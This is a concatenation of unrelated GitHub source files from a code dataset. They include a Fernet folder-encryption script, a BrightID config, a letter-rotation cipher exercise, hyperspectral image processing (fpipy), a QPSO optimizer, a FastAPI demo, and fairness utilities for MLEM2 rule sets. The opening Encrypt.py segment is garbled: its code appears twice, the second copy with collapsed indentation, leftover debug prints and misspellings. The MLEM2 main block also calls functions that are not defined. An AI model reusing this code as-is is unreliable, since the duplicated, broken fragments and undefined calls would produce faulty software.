open(\"usrinput.txt\")\nfolder = myfile.read()\nmyfile.close()\n\n# defining the directory we want\ndirec = os.listdir(folder)\n\nkey = Fernet.generate_key()\n\nos.chdir(folder)\n\n# filter in one pass; removing items from a list while iterating over it skips elements\ndirec = [f for f in direc if f not in (\"Encrypt.py\", \"README.md\", \"Decrypt.py\", \"gitignore\")]\n\nlistlen = len(direc)\nlistcheck = 0\nfor file in direc:\n    if file == \"cryptkey.key\":\n        answer = input(\"it seems that you already have a key, would you like to use it? (y/n) \")\n        if answer == \"y\":\n            # reuse the existing key: read it back instead of overwriting it\n            with open(\"cryptkey.key\", \"rb\") as cryptkey:\n                key = cryptkey.read()\n            continue\n        if answer == \"n\":\n            delete = input(\"would you like to delete the key and create a new one? (y/n) \")\n            if delete == \"y\":\n                with open(\"cryptkey.key\", \"wb\") as cryptkey:\n                    cryptkey.write(key)\n                continue\n            if delete == \"n\":\n                exit()\n    if file != \"cryptkey.key\":\n        listcheck += 1\n        if listcheck == listlen:\n            print(\"it appears you do not have a key, one will be generated for you\")\n            with open(\"cryptkey.key\", \"wb\") as cryptkey:\n                cryptkey.write(key)\n            continue\n
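\n# the key file itself must never be encrypted, so drop it from the work list\n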
(y/n)\")\n if delete == \"y\":\n with open(\"cryptkey.key\", \"wb\") as cryptkey:\n cryptkey.write(key) \n continue\n if delete == \"n\":\n exit()\n if file != \"cryptkey.key\":\n listcheck += 1\n print(\"listcheck =\", listcheck)\n print(\"listlen\", listlen)\n if listcheck == listlen:\n print(\"it apears you have do not have a key, ome will be generated for you\")\n with open(\"cryptkey.key\", \"wb\") as cryptkey:\n cryptkey.write(key)\n continue\n\n\n\n\ndirec.remove(\"cryptkey.key\")\n \n \nfor file in direc:\n print(file)\n with open(file, \"rb\") as thefile:\n contents = thefile.read()\n contents_encrypted = Fernet(key).encrypt(contents)\n with open(file, \"wb\") as thefile:\n thefile.write(contents_encrypted)\n\nprint(\"encrypted succesfully\")\n","repo_name":"FlMonkey/Encryptapp","sub_path":"Encrypt.py","file_name":"Encrypt.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36852224244","text":"BITU_VERIFIEDS_FILE = 'https://explorer.brightid.org/history/bitu_verified.json'\nBITU_FILE = '/tmp/bitu.json'\nBACKUP_URL = 'https://explorer.brightid.org/backups/brightid.tar.gz'\nFILTER_FILES_DIR = './bitu_updater/suspicious_conns'\nREGIONS_FILE = './bitu_updater/regions.json'\nRAR_ADDR = '/tmp/brightid.tar.gz'\nBACKUP_ADDR = '/tmp/brightid'\nBITU_ELIGIBLES_FILE = '/tmp/bitu_eligibles.json'\nBRIGHTID_JSON_FILE = '../brightid.json.gz'\nLAST_SUSPICIOUS_CONNS_CHECK = './bitu_updater/last_suspicious_conns_check'\nDEFAULT_QUOTA = 50\nDIRECT_PENALTY = 5\nINDIRECT_PENALTY = 1\nARANGO_SERVER_ENDPOINT = 'http://localhost:8529'\nARANGO_DB_NAME = '_system'\nCUTS_JSON_FILE = '../cuts.json'\n","repo_name":"BrightID/BrightID-Explorer","sub_path":"scripts/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"18816903984","text":"char = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\nchar = list(char)\ndef xoay(a):\n giaTriXoay = 0\n for i in range(len(a)):\n giaTriXoay += char.index(a[i])\n for i in range(len(a)):\n id = ( char.index(a[i]) + giaTriXoay ) % 26\n a[i] = char[id]\n return a\n\n\n_t = int(input())\nfor _ in range(_t):\n s = input()\n a = list( s[0:int(len(s)/2)] )\n b = list( s[int(len(s)/2):len(s)] )\n a = xoay(a)\n b = xoay(b)\n for i in range(len(a)):\n id = ( char.index(a[i]) + char.index(b[i]) ) % 26\n a[i] = char[id]\n for i in a: print(i, end='')\n print('')\n","repo_name":"NguyenVanDuc0405/Code_Python_PTIT","sub_path":"mahoa3.py","file_name":"mahoa3.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21404813099","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Functions for manipulating raw CFA data.\n\nExample\n-------\nCalculating radiances from raw data and plotting them can be done as follows::\n\n import xarray as xr\n import fpipy as fpi\n import matplotlib\n import os.path as osp\n from fpipy.data import house_raw\n\n\n data = house_raw() # Example raw data (including dark current)\n rad = fpi.raw_to_radiance(data)\n rad.swap_dims({'band': 'wavelength'}).radiance.sel(wavelength=600,\n method='nearest').plot()\n\"\"\"\nfrom enum import IntEnum\nimport xarray as xr\nimport numpy as np\nimport colour_demosaicing as cdm\nfrom . 
import conventions as c\n\n\ndef raw_to_reflectance(raw, whiteraw, keep_variables=None):\n \"\"\"Performs demosaicing and computes radiance from RGB values.\n\n Parameters\n ----------\n raw : xarray.Dataset\n A dataset containing the following variables:\n `c.cfa_data`,\n `c.dark_reference_data`,\n `c.sinv_data`,\n `c.wavelength_data´,\n `c.fwhm_data`\n `c.camera_exposure`\n\n white : xarray.Dataset\n Same as raw but for a cube that describes a white reference target.\n\n keep_variables: list-like, optional\n List of variables to keep in the result, default None.\n If you wish to keep the intermediate data, pass the relevant\n names from `fpipy.conventions`.\n\n Returns\n -------\n reflectance: xarray.Dataset or xarray.DataArray\n Includes computed radiance and reflectance as data variables sorted by\n wavelength or just the reflectance DataArray.\n \"\"\"\n radiance = raw_to_radiance(raw, keep_variables=keep_variables)\n white = raw_to_radiance(whiteraw, keep_variables=keep_variables)\n return radiance_to_reflectance(\n radiance, white,\n keep_variables=keep_variables\n )\n\n\ndef radiance_to_reflectance(radiance, white, keep_variables=None):\n \"\"\"Computes reflectance from radiance and a white reference cube.\n\n Parameters\n ----------\n radiance : xarray.Dataset\n Dataset containing the image(s) to divide by the references.\n\n white : xarray.Dataset\n White reference image(s).\n\n keep_variables: list-like, optional\n List of variables to keep in the result, default None.\n If you wish to keep the intermediate data, pass the relevant\n names from `fpipy.conventions`.\n\n Returns\n -------\n reflectance: xarray.Dataset\n Dataset containing the reflectance and the original metadata for both\n datasets indexed by measurement type.\n \"\"\"\n\n res = xr.concat(\n [radiance, white],\n dim=xr.DataArray(\n ['sample', 'white_reference'],\n dims=(c.measurement_type,),\n name=c.measurement_type,\n ),\n )\n res[c.reflectance_data] = (\n radiance[c.radiance_data] / white[c.radiance_data]\n ).assign_attrs({\n 'long_name': 'reflectance',\n 'units': '1',\n })\n\n return _drop_variable(res, c.radiance_data, keep_variables)\n\n\ndef raw_to_radiance(raw, **kwargs):\n \"\"\"Performs demosaicing and computes radiance from RGB values.\n\n Parameters\n ----------\n raw : xarray.Dataset\n A dataset containing the following variables:\n `c.sinv_data`,\n `c.wavelength_data´,\n `c.fwhm_data`\n `c.camera_exposure`\n `c.cfa_data`,\n `c.dark_reference_data`,\n\n dm_method : str, optional\n **{'bilinear', 'DDFAPD', 'Malvar2004', 'Menon2007'}**\n Demosaicing method. Default is 'bilinear'. 
See the `colour_demosaicing`\n package for more info on the different methods.\n\n keep_variables: list-like, optional\n List of variables to keep in the result, default None.\n If you wish to keep the intermediate data, pass the relevant\n names from `fpipy.conventions`.\n\n Returns\n -------\n radiances: xarray.Dataset\n Includes computed radiance sorted by wavelength along with original\n metadata.\n \"\"\"\n\n # Calculate radiances from each mosaic image (see _raw_to_rad)\n radiances = raw.groupby(c.image_index).apply(_raw_to_rad, **kwargs)\n\n # Create a band coordinate including all possible peaks from each index\n # and then drop any that don't actually have data\n # (defined by c.number_of_peaks)\n radiances = radiances.stack(\n **{c.band_index: (c.image_index, c.peak_coord)}\n )\n radiances = radiances.sel(\n **{c.band_index:\n radiances[c.peak_coord] <= radiances[c.number_of_peaks]}\n )\n\n # Sort ascending by wavelength\n radiances = radiances.sortby(c.wavelength_data)\n\n # Replace the MultiIndex band coordinate with the\n # explicit values (0...nbands)\n radiances = radiances.reset_index(c.band_index)\n radiances = radiances.assign_coords(\n **{c.band_index: radiances[c.band_index] + 1}\n )\n\n return radiances\n\n\ndef _raw_to_rad(raw, dm_method='bilinear', keep_variables=None):\n \"\"\"Compute all passband peaks from given raw image data.\n\n Applies subtract_dark, _raw_to_rgb and _rgb_to_rad\n sequentially to compute radiance from raw image mosaics.\n\n Parameters\n ----------\n raw : xr.Dataset\n Dataset containing raw CFA data and the dark reference\n to be passed through `subtract_dark`, `_raw_to_rgb` and `_rgb_to_rad`.\n\n dm_method : str, optional\n Demosaicing method passed to _rgb_to_rad. Default 'bilinear'.\n\n keep_variables: list-like, optional\n List of variables to keep in the result, default None.\n If you wish to keep the intermediate data, pass the relevant\n names from `fpipy.conventions`.\n\n Returns\n -------\n res: xr.Dataset\n Dataset containing radiance data and the relevant metadata.\n\n \"\"\"\n return raw.pipe(\n subtract_dark, keep_variables\n ).pipe(\n _raw_to_rgb, dm_method, keep_variables\n ).pipe(\n _rgb_to_rad, keep_variables\n )\n\n\ndef _raw_to_rgb(raw, dm_method, keep_variables=None):\n \"\"\"Demosaic a dataset of CFA data.\n\n Parameters\n ----------\n raw: xr.Dataset\n Dataset containing `c.dark_corrected_cfa_data` and mosaic pattern\n information either as a variable or an attribute of the cfa variable.\n\n keep_variables: list-like, optional\n List of variables to keep in the result, default None.\n If you wish to keep the raw CFA data, pass a list including\n `fpipy.conventions.cfa_data`.\n\n Returns\n -------\n res: xr.Dataset\n Dataset containing the demosaiced R, G and B layers as a variable.\n \"\"\"\n attrs = raw[c.dark_corrected_cfa_data].attrs\n if c.cfa_pattern_data in raw:\n pattern = str(raw[c.cfa_pattern_data].values)\n elif c.genicam_pattern_data in raw:\n pattern = str(raw[c.genicam_pattern_data].values)\n elif c.cfa_pattern_data in attrs:\n pattern = str(attrs[c.cfa_pattern_data])\n elif c.genicam_pattern_data in attrs:\n pattern = str(attrs[c.genicam_pattern_data])\n else:\n raise ValueError('Bayer pattern not specified.')\n\n raw[c.rgb_data] = demosaic(\n raw[c.dark_corrected_cfa_data],\n pattern,\n dm_method\n )\n\n return _drop_variable(raw, c.dark_corrected_cfa_data, keep_variables)\n\n\ndef _rgb_to_rad(rgb, keep_variables=None):\n \"\"\"Calculate all possible radiance bands from a given RGB image.\n\n Parameters\n 
----------\n rgb: xr.DataSet\n Dataset containing as variables RGB image, exposure and radiance\n inversion information.\n\n keep_variables: list-like, optional\n List of variables to keep in the result, default None.\n If you wish to keep the RGB data, pass a list including\n `fpipy.conventions.rgb_data`.\n\n Returns\n -------\n radiance: xr.Dataset\n Dataset containing radiances for each passband peak as a variable.\n\n \"\"\"\n\n # Retrieve exposure time\n if c.camera_exposure in rgb:\n exposure = rgb[c.camera_exposure].data\n elif c.genicam_exposure in rgb: # GenICam uses microseconds\n exposure = rgb[c.genicam_exposure].data * 0.001\n elif c.camera_exposure in rgb[c.rgb_data].attrs:\n exposure = rgb[c.rgb_data].attrs[c.camera_exposure]\n elif c.genicam_exposure in rgb[c.rgb_data].attrs:\n exposure = rgb[c.rgb_data].attrs[c.genicam_exposure] * 0.001\n else:\n raise ValueError('Exposure time not specified.')\n\n # Select only peaks that have data (as defined by c.number_of_peaks)\n rgb = rgb.sel(\n **{c.peak_coord: rgb[c.peak_coord] <= rgb[c.number_of_peaks]}\n )\n\n # Compute the inversion to radiance and scale by exposure time\n rgb[c.radiance_data] = rgb[c.sinv_data].dot(rgb[c.rgb_data]) / exposure\n\n # Add CF attributes\n rgb[c.radiance_data] = rgb[c.radiance_data].assign_attrs({\n 'long_name': 'radiance per unit wavelength',\n 'units': 'W sr-1 m-2 nm-1',\n })\n\n return _drop_variable(rgb, c.rgb_data, keep_variables)\n\n\ndef subtract_dark(ds, keep_variables=None):\n \"\"\"Subtracts dark current reference from image data.\n\n Subtracts a dark reference frame from all the layers in the given raw data\n and clamps any negative values in the result to zero. The result is stored\n in the dataset as the variable `c.dark_corrected_cfa_data` which is\n overwritten if it exists.\n\n Parameters\n ----------\n ds: xarray.DataSet\n Dataset containing the raw images in `fpipy.conventions.cfa_data`\n and the dark current reference measurement as\n `fpipy.conventions.dark_reference_data`.\n\n keep_variables: list-like, optional\n List of variables to keep in the result, default None.\n If you wish to keep the dark reference data and/or the original raw\n images, pass a list including the variable names.\n\n Returns\n -------\n xarray.Dataset\n Dataset with the dark corrected data as\n `fpipy.conventions.dark_corrected_cfa_data`\n\n \"\"\"\n\n ds[c.dark_corrected_cfa_data] = xr.apply_ufunc(\n _subtract_clip, ds[c.cfa_data], ds[c.dark_reference_data],\n dask='parallelized',\n output_dtypes=[\n np.result_type(ds[c.cfa_data], ds[c.dark_reference_data])\n ],\n )\n\n ds = _drop_variable(ds, c.cfa_data, keep_variables)\n ds = _drop_variable(ds, c.dark_reference_data, keep_variables)\n return ds\n\n\ndef _subtract_clip(x, y):\n \"\"\"Subtract y from x and clip to non-negative values.\n\n Retains numerical type of x and y without introducing underflows.\n \"\"\"\n result = (x > y) * (x - y)\n return result\n\n\nclass BayerPattern(IntEnum):\n \"\"\"Enumeration of the Bayer Patterns as used by FPI headers.\"\"\"\n GBRG = 0\n GRBG = 1\n BGGR = 2\n RGGB = 3\n\n # Lowercase aliases.\n gbrg = 0\n grbg = 1\n bggr = 2\n rggb = 3\n\n # Aliases (GenICam PixelColorFilter values)\n BayerGB = 0\n BayerGR = 1\n BayerBG = 2\n BayerRG = 3\n\n @classmethod\n def get(self, pattern):\n try:\n return self[pattern]\n except (KeyError, AttributeError):\n return self(pattern)\n\n def __str__(self):\n return self.name\n\n\ndef demosaic(cfa, pattern, dm_method):\n \"\"\"Perform demosaicing on a DataArray.\n\n Parameters\n 
----------\n cfa: xarray.DataArray\n Array containing a stack of CFA images.\n\n pattern: BayerPattern or str\n Bayer pattern used to demosaic the CFA.\n\n dm_method: str\n\n Returns\n -------\n xarray.DataArray\n \"\"\"\n pattern = BayerPattern.get(pattern).name\n\n dm_methods = {\n 'bilinear': cdm.demosaicing_CFA_Bayer_bilinear,\n 'Malvar2004': cdm.demosaicing_CFA_Bayer_Malvar2004,\n 'Menon2007': cdm.demosaicing_CFA_Bayer_Menon2007,\n }\n dm_alg = dm_methods[dm_method]\n\n res = xr.apply_ufunc(\n dm_alg,\n cfa,\n kwargs=dict(pattern=pattern),\n input_core_dims=[(c.height_coord, c.width_coord)],\n output_core_dims=[(c.RGB_dims)],\n dask='parallelized',\n output_dtypes=[np.float64],\n output_sizes={c.colour_coord: 3}\n )\n res.coords[c.colour_coord] = ['R', 'G', 'B']\n return res\n\n\ndef _drop_variable(ds, variable, keep_variables):\n \"\"\"Drop a given variable from the dataset unless whitelisted.\n\n Parameters\n ----------\n\n ds : xr.Dataset\n Dataset to drop variable from.\n\n variable : str\n Variable name to drop.\n\n keep_variables : list-like\n Whitelist of variables to keep.\n\n Returns\n -------\n xr.Dataset\n Original dataset with or without the given variable.\n \"\"\"\n if not keep_variables or variable not in keep_variables:\n return ds.drop(variable)\n else:\n return ds\n","repo_name":"silmae/fpipy","sub_path":"fpipy/raw.py","file_name":"raw.py","file_ext":"py","file_size_in_byte":12852,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"26407728896","text":"import numpy as np\n\ndef random_uniform(l,u):\n\treturn max(10e-8, np.random.uniform(l,u))\n\nclass QPSO:\n\tdef __init__(self, objective, swarm_size, n_dimensions, lb,ub,g, max_iterations = 500):\n\t\tself.objective = objective\n\t\tself.swarm_size = swarm_size\n\t\tself.n_dimensions = n_dimensions\n\t\tself.ub = ub\n\t\tself.lb = lb\n\t\tself.pos = np.zeros((swarm_size, n_dimensions))\n\t\tself.g = g \n\t\tself.max_iterations = max_iterations\n\n\n\t\tif(self.n_dimensions != len(lb) or self.n_dimensions != len(ub)):\n\t\t\traise Exception\n\n\tdef __initialize_swarm_particles(self):\n\n\t\tfor i in range(self.swarm_size):\n\t\t\tfor j in range(self.n_dimensions):\n\t\t\t\tself.pos[i][j] = np.random.uniform(self.lb[j], self.ub[j])\n\t\t\n\t\tself.lbest = self.pos.copy()\n\n\t\tfunc_values = [self.objective(x) for x in self.pos]\n\n\t\tix_best = np.argmin(func_values)\n\n\t\tself.gbest = self.lbest[ix_best].copy()\n\n\tdef __update_positions(self):\n\t\tfor i in range(self.swarm_size):\n\t\t\tfor j in range(self.n_dimensions):\n\t\t\t\tpsi_1 = random_uniform(0,1)\n\t\t\t\tpsi_2 = random_uniform(0,1)\n\t\t\t\tP = (psi_1*self.lbest[i][j] + psi_2 * self.gbest[j])/(psi_1 + psi_2)\n\t\t\t\tu = random_uniform(0,1)\n\t\t\t\t# self.g = random_uniform(0.5,0.99)\n\t\t\t\tL = 1/self.g * np.abs(self.pos[i][j] - P)\n\t\t\t\tchi = (self.ub[j] - self.lb[j]) / 1000.0\n\t\t\t\tif random_uniform(0,1) > 0.5:\n\t\t\t\t\tself.pos[i][j] = P - chi*L*np.log(1/u)\n\t\t\t\telse:\n\t\t\t\t\tself.pos[i][j] = P + chi*L*np.log(1/u)\n\n\tdef __update_best_positions(self):\n\t\tfunc_values = []\n\t\tfor i in range(self.swarm_size):\n\t\t\tf1 = self.objective(self.pos[i])\n\t\t\tf2 = self.objective(self.lbest[i])\n\t\t\t\n\t\t\tif(f1 < f2):\n\t\t\t\tself.lbest[i] = self.pos[i].copy()\n\t\t\t\tfunc_values.append(f1)\n\t\t\telse:\n\t\t\t\tfunc_values.append(f2)\n\n\t\tix_best = np.argmin(func_values)\n\t\tself.gbest = self.lbest[ix_best].copy()\n\n\n\tdef 
run(self):\n\t\tself.__initialize_swarm_particles()\n\t\tfor i in range(self.max_iterations):\n\t\t\tprint(self.objective(self.gbest))\n\t\t\tself.__update_positions()\n\t\t\tself.__update_best_positions()\n\n\t\treturn self.gbest\n","repo_name":"LuckysonKhaidem/HyperVolume-Maximization","sub_path":"qpso.py","file_name":"qpso.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"2637624536","text":"from fastapi import FastAPI\nfrom pydantic import BaseModel\nimport random\nimport os\n\nserver = FastAPI(title='My API')\n\n\n@server.get('/status')\nasync def get_status():\n    \"\"\"Returns 1 if the API is up\n    \"\"\"\n    return {\n        'status': 1\n    }\n\n\n@server.get('/environment')\nasync def get_environment():\n    \"\"\"\n    If the environment variable ENVIRONMENT_TYPE is set, returns it\n    \"\"\"\n    environment_type = os.environ.get('ENVIRONMENT_TYPE')\n    if environment_type:\n        return {\n            'environment': environment_type\n        }\n    else:\n        return {\n            'environment': 'unknown'\n        }\n\n\nclass Sentence(BaseModel):\n    sentence: str = 'hello world'\n    language: str = 'en'\n\n\nclass PredictedSentence(Sentence):\n    score: float = 0.\n\n\n@server.post('/predict', response_model=PredictedSentence)\nasync def post_sentence(sentence: Sentence):\n    \"\"\"Returns the sentiment of the sentence\n    \"\"\"\n    return PredictedSentence(\n        sentence=sentence.sentence,\n        language=sentence.language,\n        score=random.uniform(0, 1)\n    )\n","repo_name":"polymoe/datascientest","sub_path":"Kubernetes/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36641965709","text":"# coding: utf-8\n# python 3.5\nimport sys\nimport os\nsys.path.append('/Users/ooki/git/research_dr/python/MLEM2')\nsys.path.append(os.path.dirname(os.path.abspath(\"__file__\"))+'/../MLEM2')\nfrom sklearn.metrics import accuracy_score\nimport copy\nimport importlib\nimport mlem2\nimport LERS\nimportlib.reload(mlem2)\nimportlib.reload(LERS)\nfrom rules_stat import getNumRulesClass\nfrom rules_stat import getRulesValueCount\n\n# =====================================\n# Remove the fairness-sensitive attributes list_s from decision_table\n# =====================================\ndef delDiscriminativeAttributes(decision_table, list_s):\n    return(decision_table.drop(list_s, axis=1))\n\n# =====================================\n# Return the number of rules that contain attribute attr / elementary condition e (value v of attribute attr)\n# =====================================\ndef getNumRulesIncludeAttr(list_rules, attr) :\n    rules = [r for r in list_rules if attr in r.getKey()]\n    return(len(rules))\n\ndef getNumRulesIncludeE(list_rules, attr, v) :\n    rules = [r for r in list_rules if r.getValue(attr) == v]\n    return(len(rules))\n\ndef getNumRulesClassIncludeAttr(list_rules, attr, cls) :\n    rules = [r for r in list_rules if (attr in r.getKey()) and r.getConsequent() == cls]\n    return(len(rules))\n\ndef getNumRulesClassIncludeE(list_rules, attr, v, cls) :\n    rules = [r for r in list_rules if r.getValue(attr) == v and r.getConsequent() == cls]\n    return(len(rules))\n\ndef getNumRulesIncludeMultipleE(list_rules, dict_attribute_value):\n    tmp_rules = list_rules\n    for attr in dict_attribute_value.keys():\n        for v in dict_attribute_value[attr] :\n            tmp_rules = [r for r in tmp_rules if r.getValue(attr) == v]\n    return(len(tmp_rules))\n\ndef getNumRulesClassIncludeMultipleE(list_rules, dict_attribute_value, cls):\n    tmp_rules = list_rules\n    for attr in dict_attribute_value.keys():\n        for v in dict_attribute_value[attr] :\n            tmp_rules = [r for r in tmp_rules if r.getValue(attr) == v and r.getConsequent() == cls]\n    return(len(tmp_rules))\n\n# ======================================\n# Return the contingency table entries a, b, c, d\n# ======================================\ndef getContingencyTable(list_rules, dict_attribute_value, CLASSES):\n    N = len(list_rules)\n    n1 = getNumRulesClass(list_rules, CLASSES[\"bad\"])\n    n2 = getNumRulesClass(list_rules, CLASSES[\"good\"])\n    a = getNumRulesClassIncludeMultipleE(list_rules, dict_attribute_value, CLASSES[\"bad\"])\n    b = n1 - a\n    c = getNumRulesClassIncludeMultipleE(list_rules, dict_attribute_value, CLASSES[\"good\"])\n    d = n2 - c\n    return(a,b,c,d)\n\n# =====================================\n# Return the rules that contain attribute attr / elementary condition e (value v of attribute attr)\n# =====================================\ndef getRulesIncludeAttr(list_rules, attr) :\n    rules = [r for r in list_rules if attr in r.getKey()]\n    return(rules)\n\ndef getRulesIncludeE(list_rules, attr, v) :\n    rules = [r for r in list_rules if r.getValue(attr) == v]\n    return(rules)\n\n# =====================================\n# Return the rules that do not contain attribute attr / elementary condition e\n# =====================================\ndef getRulesExcludeAttr(list_rules, attr) :\n    rules = [r for r in list_rules if not attr in r.getKey()]\n    return(rules)\n\ndef getRulesExcludeE(list_rules, attr, v) :\n    rules = [r for r in list_rules if r.getValue(attr) != v]\n    return(rules)\n\n# =====================================\n# Return the rules with attribute attr / elementary condition e removed\n# Return a single rule with attribute attr / elementary condition e removed\n# =====================================\ndef getRulesDelAttr(list_rules, attr) :\n    rules = [delAttrFromRule(r, attr) for r in list_rules]\n    return(rules)\n\ndef getRulesDelE(list_rules, attr, v) :\n    rules = [delEFromRule(r, attr, v) for r in list_rules]\n    return(rules)\n\ndef delAttrFromRule(rule, attr) :\n    rule_new = copy.deepcopy(rule)\n    rule_new.delKey(attr)\n    return(rule_new)\n\ndef delEFromRule(rule, attr, v) :\n    if rule.getValue(attr) == v : return(delAttrFromRule(rule, attr))\n    else : return(rule)\n\n# =====================================\n# Return the rules excluding any alpha-discriminatory rule\n# Return an alpha-discriminatory rule with its elementary condition e removed\n# =====================================\ndef getAlphaRulesExcludeE(list_rules, attr, v, decision_table, list_judgeNominal, alpha = 0) :\n    rules = [r for r in list_rules if getElift(r, attr, v, decision_table, list_judgeNominal) <= alpha ]\n    return(rules)\n\ndef getAlphaRulesDelE(list_rules, attr, v, decision_table, list_judgeNominal, alpha = 0) :\n    rules = [delEFromAlphaRule(r, attr, v, decision_table, list_judgeNominal, alpha = 0) for r in list_rules]\n    return(rules)\n\ndef delEFromAlphaRule(rule, attr, v, decision_table, list_judgeNominal, alpha = 0):\n    if rule.getValue(attr) == v :\n        elift = getElift(rule, attr, v, decision_table, list_judgeNominal)\n        if elift > alpha : return(delAttrFromRule(rule, attr))\n        else : return(rule)\n    else :\n        return(rule)\n\n# =====================================\n# Return the rules excluding M-discriminatory rules / with their elementary condition e removed\n# =====================================\ndef getMRulesFUN(list_rules, attr, v, target_cls, DELFUN, m = 0) :\n    num_target_cls, num_other_cls, list_num_other_cls = 0, 0, []\n    classes = mlem2.getEstimatedClass(list_rules)\n    for cls in classes :\n        if cls == target_cls :\n            num_target_cls = getNumRulesClassIncludeE(list_rules, attr, v, cls)\n        else :\n            list_num_other_cls.append(getNumRulesClassIncludeE(list_rules, attr, v, cls))\n    num_other_cls = sum(list_num_other_cls) / len(list_num_other_cls) # account for the multi-class case\n    if (num_target_cls / (num_target_cls + num_other_cls)) > m : # if the rule set is m-protected\n        return(list_rules)\n    else :\n        return(DELFUN(list_rules, attr, v))\n\n# =====================================\n# Build a decision table of only the objects supported by rules with the sensitive value v\n# =====================================\ndef createDTSuppoterdbyRule(list_rules, attr, v, cls, decision_table):\n    target_indice = []\n    target_rules = [r for r in list_rules if r.getValue(attr) == v and r.getConsequent() == cls]\n    for rule in target_rules:\n        target_indice.extend(rule.getSupport())\n    target_indice = list(set(target_indice))\n    target_indice = sorted(target_indice)\n    new_decision_table = decision_table.ix[target_indice]\n    new_decision_class = new_decision_table[new_decision_table.columns[-1]].values.tolist()\n    return(new_decision_table, new_decision_class)\n\n# Function to reduce the rules of the favorable decision class for the sensitive attribute s\n\n\n# =====================================\n# elift of a rule for the sensitive attribute s on decision_table\n# =====================================\ndef getElift(rule, attr, v, decision_table, list_judgeNominal):\n    supp, conf = LERS.getSupportConfidence(rule, decision_table, list_judgeNominal)\n    rule_s = delEFromRule(rule, attr, v)\n    supp_s, conf_s = LERS.getSupportConfidence(rule_s, decision_table, list_judgeNominal)\n    if conf_s == 0: elift = 999\n    else : elift = conf / conf_s\n    return(elift)\n\n# =====================================\n# slift of a rule for the sensitive attribute s on decision_table\n# =====================================\ndef getSlift(rule, s, decision_table, list_judgeNominal, operator):\n    conditions = mlem2.getConditionValues(decision_table, s)\n    # pass list_judgeNominal through so the call matches the getClift signature\n    clifts = [getClift(rule, s, c, decision_table, list_judgeNominal) for c in conditions]\n    slift = operator(clifts)\n    return(slift)\n\n# =====================================\n# clift of a rule for the sensitive attribute s and a substitute value c on decision_table\n# =====================================\ndef getClift(rule, s, c, decision_table, list_judgeNominal):\n    supp, conf = LERS.getSupportConfidence(rule, decision_table,list_judgeNominal)\n    rule_c = mlem2.delEfromRule(rule,s)\n    rule_c = rule_c.setValue(s,c)\n    supp_c, conf_c = LERS.getSupportConfidence(rule_c, decision_table, list_judgeNominal)\n    clift = conf / conf_c\n    return(clift)\n\n# ====================================\n# Return the attribute-value dict as a string\n# ====================================\ndef strAttributeValue(ATTRIBUTE_VALUE) :\n    list_string = []\n    for i in ATTRIBUTE_VALUE :\n        list_string.append(i+\"-\".join(ATTRIBUTE_VALUE[i]))\n    return(\"+\".join(list_string))\n\n# ====================================\n# Return the attribute-value dict as an item set\n# ====================================\ndef getItemSet(rule_value) :\n    itemset = set()\n    for attr in rule_value :\n        itemset.add(attr+\"-\".join(rule_value[attr]))\n    return(itemset)\n\ndef jaccard(set1, set2):\n    set_and = set1 & set2\n    set_or = set1 | set2\n    if len(set_or) == 0 :\n        return(0)\n    else :\n        return(len(set_and)/len(set_or))\n\n# ========================================\n# main\n# ========================================\nif __name__ == \"__main__\":\n\n    # settings\n    DIR_UCI = '/mnt/data/uci/'\n    FILENAME = 'german_credit_categorical'\n    iter1 = 1\n    iter2 = 1\n\n    # rule induction\n    rules = mlem2.getRulesByMLEM2(FILENAME, iter1, iter2)\n\n    # test data\n    filepath = DIR_UCI+FILENAME+'/'+FILENAME+'-test'+str(iter1)+'-'+str(iter2)+'.tsv'\n    decision_table_test = mlem2.getDecisionTable(filepath)\n    decision_table_test = decision_table_test.dropna()\n    decision_class = decision_table_test[decision_table_test.columns[-1]].values.tolist()\n\n    # nominal data\n    filepath = 
DIR_UCI+FILENAME+'/'+FILENAME+'.nominal'\n    list_nominal = mlem2.getNominalList(filepath)\n    list_judgeNominal = mlem2.getJudgeNominal(decision_table_test, list_nominal)\n\n    # predict by LERS\n    predictions = LERS.predictByLERS(rules, decision_table_test, list_judgeNominal)\n\n    # compute the accuracy\n    accuracy_score(decision_class, predictions)\n\n    # number of rules\n    num = len(rules)\n    # mean rule length\n    mean_length = mlem2.getMeanLength(rules)\n\n    # train data setup\n    decision_table_train, decision_class = getData(FILENAME, iter1, iter2, T = \"train\")\n    list_judgeNominal = getJudgeNominal(decision_table_train, FILENAME)\n\n    # mean support and mean confidence\n    mean_support, mean_conf = LERS.getSupportConfidenceRules(rules, decision_table_train, list_judgeNominal)\n    # accuracy and recall\n    acc_recall = LERS.getAccurayRecall(rules, decision_table_train, list_judgeNominal)\n    for i,c in enumerate(mlem2.getEstimatedClass(rules)):\n        print(str(acc_recall[i][0])+\",\"+str(acc_recall[i][1]))\n\n    ###### fairness tests\n\n    # rule sets containing an elementary condition\n    rules_sex_2 = mlem2.getRulesIncludeE(rules, \"Sex_Marital_Status\", \"2.0\")\n    rules_sex_4 = mlem2.getRulesIncludeE(rules, \"Sex_Marital_Status\", \"4.0\")\n    # rule set not containing the attribute\n    rules_exclude_sex = mlem2.getRulesExcludeAttr(rules, \"Sex_Marital_Status\")\n    # rule set not containing the elementary condition\n    rules_exclude_sex_1 = mlem2.getRulesExcludeE(rules, \"Sex_Marital_Status\", \"1.0\")\n    # rule set with the attribute removed\n    rules_del_value = mlem2.getRulesDelAttr(rules, \"Value_Savings_Stocks\")\n    # rule set with the elementary condition removed\n    rules_del_value_1 = mlem2.getRulesDelE(rules, \"Value_Savings_Stocks\", \"1.0\")\n\n    # example of removing a single condition\n    rule = mlem2.delAttrFromRule(rules[12],'No_of_dependents')\n    rule = 